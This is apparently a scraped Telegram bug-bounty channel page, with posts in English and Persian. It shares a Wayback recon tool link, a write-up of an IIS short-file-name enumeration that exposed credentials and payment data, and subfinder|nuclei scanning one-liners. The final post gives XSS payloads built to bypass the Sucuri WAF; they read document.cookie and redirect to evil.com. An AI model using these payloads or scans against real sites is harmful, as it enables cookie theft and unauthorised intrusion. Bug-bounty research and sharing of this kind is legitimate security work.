Bugbounty Tips
2.72K subscribers
80 photos
5 videos
13 files
83 links
research and sharing in cybersecurity
加入频道
The Time Machine - Weaponizing WaybackUrls for Recon, BugBounties , OSINT, Sensitive Endpoints and what not


https://github.com/anmolksachan/TheTimeMachine?tab=readme-ov-file



https://yangx.top/rootdr_research Join to channel For more (:


#BugBounty
#Tools
#Link
👍6
9👍6
آسیب پذیری با امتیاز 7.5 در برنامه باگ بانتی:
بعد از Subdomain Enumration از تارگت به صفحه sub.target.com صفحه پیشفرض وب سرور IIS رو پیدا کردم.
دایرکتوری و فایل های حساس رو فاز کردم ولی نتیجه نداشت. بعدش از طریق روشی که سروش دلیلی محقق وب ایرانی کشف کرده بود،
به بررسی وجود آسیب پذیری IIS Short File Name Enumeration رفتم که تونستم وجود این آسیب پذیری رو با این ابزار تایید کنم و یکسری اسم فایل که اسم تقریبی بودن رو پیدا کردم.
ازجمله yechizi.zip که البته این yechizi ناقص بود و با حدس و سعی کردن تونستم اسم فایل رو حدس بزنم و این فایل 10 مگابایتی رو دانلود کنم.
فایل شامل:کردنشیال دیتابیس،اطلاعات پرداختی،کمپین های مالی و سورس کد بود، که با توجه به محدوده پرداختی کمپانی رقم بالا بهش تعلق گرفت.
پس این صفحه رو پیدا کردید این متد فراموش نشه (:

امیدوارم این تجربه براتون مفید بوده باشه.

For more join to channel (:

https://yangx.top/rootdr_research


#Web
#BugBounty
#Link
👍19🔥72
یک چنل با محتوای بدرد بخور:
https://yangx.top/bugbounty_poc
ویدیو اثبات آسیب پذیری هارو به اشتراک میزاره و بنظرم خیلی میتونه کمک خوبی باشه.

For more join to channel (:

https://yangx.top/rootdr_research

#LINK
#WEB
👍15🔥1
https://github.com/coffinxp/nuclei-templates



how to use in bug bounty programs:
subfinder -d xyz.com -all  | nuclei -t crlf.yaml -rl 50
subfinder -d xyz.com -all  | nuclei -t openRedirect.yaml -rl 100
subfinder -d xyz.com -all  | nuclei -t iis.yaml
subfinder -d xyz.com -all  | nuclei -t cors.yaml -rl 100
subfinder -d xyz.com -all  | waybackurls | gf sqli | uro | nuclei -t errorsqli.yaml -rl 50

For more join to channel (:

https://yangx.top/rootdr_research

#LINK
#WEB
👍5👎1🔥1
Sucuri WAF Bypass:


payload:
<a aa aaa aaaa aaaaaa href=j&#97v&#97script&#x3A;&#97lert(document.cookie)>ClickMe


<a href="j&#97;vascript&#x3A;&#97;lert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window&#46;location&#46;href='https://evil.com';">ClickMe</a>



For more join to channel (:

https://yangx.top/rootdr_research

#LINK
#WEB
👍3👀2